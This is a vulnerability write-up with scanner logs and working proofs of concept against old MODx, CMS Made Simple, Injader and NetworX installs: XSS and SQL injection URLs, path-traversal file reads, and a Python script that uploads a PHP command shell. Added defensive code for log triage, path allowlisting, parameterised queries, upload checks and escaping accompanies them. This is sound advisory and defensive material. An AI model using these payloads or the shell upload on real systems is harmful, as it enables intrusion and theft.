All testing was performed on Windows XP and Vista using XAMPP. Each target application was installed, then a full scan was performed. Noteworthy log entries revealing exploitable faults are shown, followed by the exploit proofs of concept and the resulting advisories.
Source: autosectools.com
Case Study 1: MODx Revolution 2.0.2-pl
Reflected Cross-site Scripting Log Entry
Alert Name: Reflected XSS

GET /modx/manager/index.php?service=12%3cscript%3ealert(0)%3c%2fscript%3e&login_context=12%3cscript%3ealert(0)%3c%2fscript%3e&q=12%3cscript%3ealert(0)%3c%2fscript%3e&cultureKey=12%3cscript%3ealert(0)%3c%2fscript%3e&modahsh=12%3cscript%3ealert(0)%3c%2fscript%3e&installGoingOn=12%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 13:54:18 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=653ch30lgkjk9bo8b7gu13u8u4; expires=Thu, 27-Jan-2011 13:54:18 GMT; path=/modx/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 20 Jan 2011 13:54:18 GMT
Cache-Control: post-check=0, pre-check=0
Content-Length: 6946
Content-Type: text/html; charset=UTF-8

[Response Trimmed]
<form id="modx-login-form" action="" method="post">
<input type="hidden" name="login_context" value="mgr" />
<input type="hidden" name="modahsh" value="12<script>alert(0)</script>" />
[Response Trimmed]
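The scanner log entries in these case studies are flat request/response dumps, and the payloads in them are URL-encoded. For a defender reviewing such logs the useful first step is to pull out the request line, decode the query string and flag the indicator classes the case studies show (script tags, ../ sequences with a trailing NUL, quote-and-comment sequences). The following is an added example written for this page; it is not part of the original write-up or of the autosectools scanner. The sample lines are constructed, abbreviated copies of the alert lines on this page, and the indicator patterns are my own assumptions rather than the scanner's rules.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed samples: alert name plus request line from the scanner log
# entries on this page, abbreviated (extra parameters and most headers
# dropped). The last entry is a benign request with no query string.
SAMPLE_ALERTS = [
    "Alert Name: Reflected XSS GET /modx/manager/index.php?service=12%3cscript%3ealert(0)%3c%2fscript%3e&modahsh=12%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1 Host: localhost",
    "Alert Name: Local File Inclusion POST /modx/manager/controllers/default/resource/tvs.php?class_key=..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1 Host: localhost",
    "Alert Name: Potential SQL Injection POST /injader/login.php?un='%3b--%22%3b--&pw='%3b--%22%3b-- HTTP/1.1 Host: localhost",
    "Alert Name: Reflected XSS GET /networx/about.php HTTP/1.1 Host: localhost",
]

REQUEST_LINE = re.compile(r"\b(GET|POST|PUT|DELETE|HEAD)\s+(\S+)\s+HTTP/1\.[01]")

# Indicators are matched against the fully URL-decoded parameter value, so
# %3c / %2f / %00 encoding does not hide them. These patterns are assumptions
# chosen to cover the three payload types seen on this page.
INDICATORS = {
    "xss": re.compile(r"<\s*script|\bon\w+\s*=|javascript:", re.I),
    "traversal": re.compile(r"\.\.[/\\]|\x00"),
    "sqli": re.compile(r"'\s*(;|--|or\b)|'\s*=\s*'", re.I),
}


def decode_fully(value, max_rounds=3):
    """Decode repeatedly so a double-encoded value is seen in plain form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_alert(line):
    """Return {'method', 'path', 'findings'} for one alert line, or None when
    the line carries no HTTP request line. findings maps each query parameter
    to the sorted list of indicator names that fired on its decoded value."""
    m = REQUEST_LINE.search(line)
    if m is None:
        return None
    method, target = m.group(1), m.group(2)
    url = urlsplit(target)
    findings = {}
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        value = decode_fully(raw)
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(value))
        if hits:
            findings[name] = hits
    return {"method": method, "path": url.path, "findings": findings}


def triage(lines):
    """Keep only alerts whose query string carries at least one indicator."""
    out = []
    for line in lines:
        result = analyze_alert(line)
        if result and result["findings"]:
            out.append(result)
    return out


if __name__ == "__main__":
    for r in triage(SAMPLE_ALERTS):
        print(r["method"], r["path"], r["findings"])
```

Running it lists three of the four sample alerts with the parameter names that carried a payload; the fourth has no query string and is dropped. The same parsing applies to ordinary web-server access logs once the request line is extracted, and decoding before matching is what makes the %3c and %00 forms visible.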
Reflected Cross-site Scripting Proof of Concept
http://localhost/modx/manager/index.php?modahsh=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Local File Inclusion Log Entry
Alert Name: Local File Inclusion

POST /modx/manager/controllers/default/resource/tvs.php?class_key=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&resource=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 04:21:29 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 11
Content-Type: text/html

LFI_Test123
Local File Inclusion Proof of Concept
http://localhost/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
Case Study 2: CMS Made Simple 1.8
Local File Inclusion Log Entry
Alert Name: Local File Inclusion

POST /cmsms/admin/addbookmark.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 192
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="default_cms_lang"

../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt
------x--

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 05:00:36 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: CMSSESSID839fe7b5=uk0uvk8aja6cfajgluik3sbok3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sp_=883fc4fd
Content-Length: 322
Content-Type: text/html

LFI_Test123<script type="text/javascript">
<!--
location.replace("http://localhost/cmsms/admin/login.php");
// -->
</script>
<noscript>
<meta http-equiv="Refresh" content="0;URL=http://localhost/cmsms/admin/login.php">
</noscript>
Local File Inclusion Proof of Concept
import httplib, urllib

host = 'localhost'
path = '/cmsms'
lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
          urllib.urlencode({ 'default_cms_lang': lfi }),
          { 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()
print r.status, r.reason
print r.read()
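Both local file inclusion findings so far, MODx's class_key and CMS Made Simple's default_cms_lang, share one failure mode: a request value that should be a plain identifier is joined onto a path and handed to include, and the trailing NUL byte cuts off whatever extension the application appends. The check below is an added example written for this page; it is not code from either project. It shows the allowlist-plus-containment pattern that refuses both payloads before any file-system access. The base directory name "lang" and the ".php" extension are assumptions, and the two payload strings are constructed copies of the ones on this page.

```python
import os
import re

# Constructed copies of the two payloads shown on this page.
MODX_CLASS_KEY = "../" * 32 + "lfi_test.txt\x00"
CMSMS_LANG = "../" * 32 + "windows/win.ini\x00"

# A class key or language code is an identifier, never a path: allow only
# [A-Za-z0-9_] of bounded length. Anything else is rejected before a single
# file-system call, which also disposes of the NUL-byte truncation trick
# without special-casing it.
SAFE_NAME = re.compile(r"[A-Za-z0-9_]{1,64}")


def safe_include_path(base_dir, user_value, ext=".php"):
    """Map an untrusted identifier onto a file inside base_dir.

    Returns the absolute path or raises ValueError. The allowlist is the
    primary control; the realpath containment check is an independent second
    layer that still holds if the allowlist is ever loosened."""
    if not SAFE_NAME.fullmatch(user_value):
        raise ValueError("identifier contains characters outside [A-Za-z0-9_]")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value + ext))
    # commonpath, not startswith: "/srv/lang" must not accept "/srv/lang2/x".
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes %s" % base)
    return candidate


def is_rejected(base_dir, user_value):
    """True if safe_include_path refuses user_value (convenience for checks)."""
    try:
        safe_include_path(base_dir, user_value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for value in (MODX_CLASS_KEY, CMSMS_LANG, "..", "en/US", "en_US"):
        shown = repr(value[:20] + ("..." if len(value) > 20 else ""))
        if is_rejected("lang", value):
            print(shown, "-> rejected")
        else:
            print(shown, "->", safe_include_path("lang", value))
```

The realpath step matters even with the allowlist in place: a later change that permits "." or "-" in identifiers would otherwise silently reopen the traversal, and the containment check catches that regardless of how the identifier rule evolves.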
Case Study 3: Injader 2.4.4
SQL Injection Log Entry
Alert Name: Potential SQL Injection

POST /injader/login.php?un='%3b--%22%3b--&pw='%3b--%22%3b-- HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 02:30:15 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 794
Content-Type: text/html

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>C:\tools\xampp\htdocs\injader\sys\includes\ifw\IQuery.php</b> on line <b>143</b><br />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>Database Error</title>
<link rel="stylesheet" type="text/css" href="/injader/sys/loginpage.css" />
</head>
<body>
<div id="mPage">
<h1>Database Error</h1>
<p>Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1. </p>
<p>Your query was: SELECT username, id FROM maj_users WHERE username = '\'</p>
<p id="err-src"><strong>Source:</strong> User::ValidateLogin; Line: 179</p>
</div>
</body>
</html>
SQL Injection Proof of Concept
http://localhost/injader/login.php?un=\\'%20or%20id=1%20and%20'a'='a&pw=\\'%20or%20'a'='a
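The error page above is doing two things a defender should notice: it echoes the full query text, and that text shows the raw un value spliced straight into the string literal (WHERE username = '\'). The added example below is not Injader's code; it reproduces the same concatenation pattern against an in-memory SQLite table named after the one in the error message, with a parameterised version beside it, so the two behaviours can be compared on the same inputs. The table columns and rows are constructed. SQLite is used here because it is in the standard library; its quote escaping differs from MySQL's backslash handling, so the exact probe strings differ from the page's, but the outcome for each variant is the same in kind.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the maj_users table named in the error page."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE maj_users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO maj_users (username, pw_hash) VALUES (?, ?)",
        [("admin", "hash-a"), ("alice", "hash-b")],
    )
    return conn


def lookup_user_unsafe(conn, username):
    """The pattern visible in the error page: the request value becomes part
    of the SQL text, so quote characters change the statement's structure."""
    sql = "SELECT username, id FROM maj_users WHERE username = '%s'" % username
    return conn.execute(sql).fetchall()


def lookup_user_safe(conn, username):
    """Parameterised form: the value is bound after parsing and can only ever
    be compared as data, whatever characters it contains."""
    sql = "SELECT username, id FROM maj_users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def probe(username):
    """Run both variants on one input. Returns (unsafe_outcome, safe_outcome),
    where an outcome is a row list or the string 'syntax error'."""
    conn = make_db()
    try:
        unsafe = lookup_user_unsafe(conn, username)
    except sqlite3.OperationalError:
        unsafe = "syntax error"
    safe = lookup_user_safe(conn, username)
    conn.close()
    return unsafe, safe


if __name__ == "__main__":
    for value in ("admin", "'", "' or id=1 --"):
        print(repr(value), "->", probe(value))
```

The single-quote input reproduces the page's symptom exactly: the concatenated statement fails to parse, and an application that prints the driver's message, as this one does, is confirming to the sender that the input reached the SQL parser. The parameterised lookup returns an empty result for the same input and never raises; that difference, not input filtering, is the fix.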
Case Study 4: NetworX 1.0.3
Arbitrary Upload Log Entry
Alert Name: Arbitrary File Event - Type=Changed Path=C:\tools\xampp\htdocs\networx\tmp\shell.php

POST /networx/about.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 195
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="shell_file"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>
------x--

HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:34:40 GMT
[Trimmed]
Shell Upload Proof of Concept
import sys, socket

host = 'localhost'
path = '/networx'
port = 80

def upload_shell():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)
    s.send('POST ' + path + '/upload.php?logout=shell.php HTTP/1.1\r\n'
           'Host: ' + host + '\r\n'
           'Proxy-Connection: keep-alive\r\n'
           'User-Agent: x\r\n'
           'Content-Length: 193\r\n'
           'Cache-Control: max-age=0\r\n'
           'Origin: null\r\n'
           'Content-Type: multipart/form-data; boundary=----x\r\n'
           'Accept: text/html\r\n'
           'Accept-Encoding: gzip,deflate,sdch\r\n'
           'Accept-Language: en-US,en;q=0.8\r\n'
           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
           '------x\r\n'
           'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
           'Content-Type: application/octet-stream\r\n\r\n'
           '<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'
           '------x--\r\n\r\n')
    resp = s.recv(8192)
    http_ok = 'HTTP/1.1 200 OK'
    if http_ok not in resp[:len(http_ok)]:
        print 'error uploading shell'
        return
    else:
        print 'shell uploaded'
    shell_path = path + '/tmp/shell.php'
    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'
           'Host: ' + host + '\r\n\r\n')
    if http_ok not in s.recv(8192)[:len(http_ok)]:
        print 'shell not found'
    else:
        print 'shell located at http://' + host + shell_path

upload_shell()
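The file event in the log entry tells the whole story of this finding: a file with the client's chosen name, shell.php, lands under the document root where the PHP handler will run it. Three controls together close that path: only allow a short list of extensions, check that the body actually begins with the declared type's magic bytes, and choose the stored name on the server. The handler below is an added example, not NetworX code. The upload directory is an assumed location outside the web root, the allowed types are a constructed list, and the sample body is a copy of the file the scanner uploaded on this page.

```python
import os
import secrets

# Magic-number prefixes for the only types this handler stores (constructed
# list; extend per application).
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
    ".jpg": b"\xff\xd8\xff",
}

# Assumed layout: uploads live outside the document root and are delivered
# through a download script, never handed to the PHP handler. This path is
# an assumption for the example, not one taken from the page.
UPLOAD_DIR = "/srv/app-data/uploads"

# Constructed copy of the file body the scanner uploaded (shown on this page).
PAGE_SHELL = b"<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>"


def validate_upload(client_filename, content):
    """Return a server-chosen storage name for content, or raise ValueError.

    The client filename is consulted only for the claimed extension; the
    stored name is random, so a caller can neither predict nor pick it."""
    ext = os.path.splitext(client_filename)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise ValueError("extension not allowed: %r" % ext)
    if not content.startswith(ALLOWED_TYPES[ext]):
        raise ValueError("content does not match claimed type %s" % ext)
    if b"<?php" in content or b"<?=" in content:
        # Polyglot heuristic: a genuine image header with PHP tags appended
        # is still refused, since a misconfigured server might execute it.
        raise ValueError("PHP open tag inside upload")
    return secrets.token_hex(16) + ext


def storage_path(client_filename, content):
    """Full path the validated upload would be written to."""
    return os.path.join(UPLOAD_DIR, validate_upload(client_filename, content))


def is_rejected(client_filename, content):
    """True if validate_upload refuses the pair (convenience for checks)."""
    try:
        validate_upload(client_filename, content)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + bytes(16)
    for name, body in (("shell.php", PAGE_SHELL),
                       ("shell.php.png", PAGE_SHELL),
                       ("photo.png", b"\x89PNG\r\n\x1a\n" + PAGE_SHELL),
                       ("photo.PNG", png)):
        if is_rejected(name, body):
            print(name, "-> rejected")
        else:
            print(name, "->", storage_path(name, body))
```

Storing outside the document root is the control that matters most: even if every check above were bypassed, a file that the web server never executes cannot become a shell. The "Arbitrary File Event" alert the scanner raised is itself a good detection to keep in production, in the form of file-integrity monitoring on any directory the web server can write to.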
Reflected Cross-site Scripting Log Entry
Alert Name: Reflected XSS

GET /networx/group_connections_list_popup.php?logout=181%3cscript%3ealert(0)%3c%2fscript%3e&group_id=181%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:38:22 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=jl5bal27shg6e9akhu5566lqu7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2107
Content-Type: text/html

[Trimmed]
<input type="hidden" name="GroupID" value="181<script>alert(0)</script>" />
<input type="image" src="images/btn-send_invitations.gif" alt="Send Invitations" />
[Trimmed]
Reflected Cross-site Scripting Proof of Concept
http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
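Both reflected XSS findings on this page (MODx's modahsh and NetworX's group_id) have the same shape: the request value is written into a hidden input's value attribute without encoding, so a leading double quote closes the attribute and the rest is parsed as markup. The example below is added for this page and is not code from either project. It puts the unencoded pattern beside the attribute-encoded one and uses the standard library's HTML parser to show which elements each version actually produces; the field name and probe value are the ones from the page.

```python
import html
from html.parser import HTMLParser

# The probe value from this page's two reflected XSS proofs of concept.
PAYLOAD = '"><script>alert(0)</script>'


def hidden_input_unsafe(name, value):
    """The pattern seen in the MODx and NetworX responses: the raw request
    value is spliced into an attribute with no encoding."""
    return '<input type="hidden" name="%s" value="%s" />' % (name, value)


def hidden_input(name, value):
    """Attribute-context encoding: quotes and angle brackets become entities,
    so the parser keeps the entire value inside the attribute."""
    return '<input type="hidden" name="%s" value="%s" />' % (
        html.escape(name, quote=True),
        html.escape(value, quote=True),
    )


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees, in document order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def element_names(markup):
    """Which elements a parser finds in markup; the unencoded version yields
    an extra script element, the encoded one yields only the input."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    for fn in (hidden_input_unsafe, hidden_input):
        markup = fn("GroupID", PAYLOAD)
        print(fn.__name__, element_names(markup))
        print("   ", markup)
```

The encoding is specific to the attribute context: html.escape with quote=True is correct for a double-quoted attribute value, but a value placed inside a script block or a URL needs the encoding for that context instead. A Content-Security-Policy without 'unsafe-inline' is a useful second layer for the inline script case the scanner found, but it does not replace output encoding.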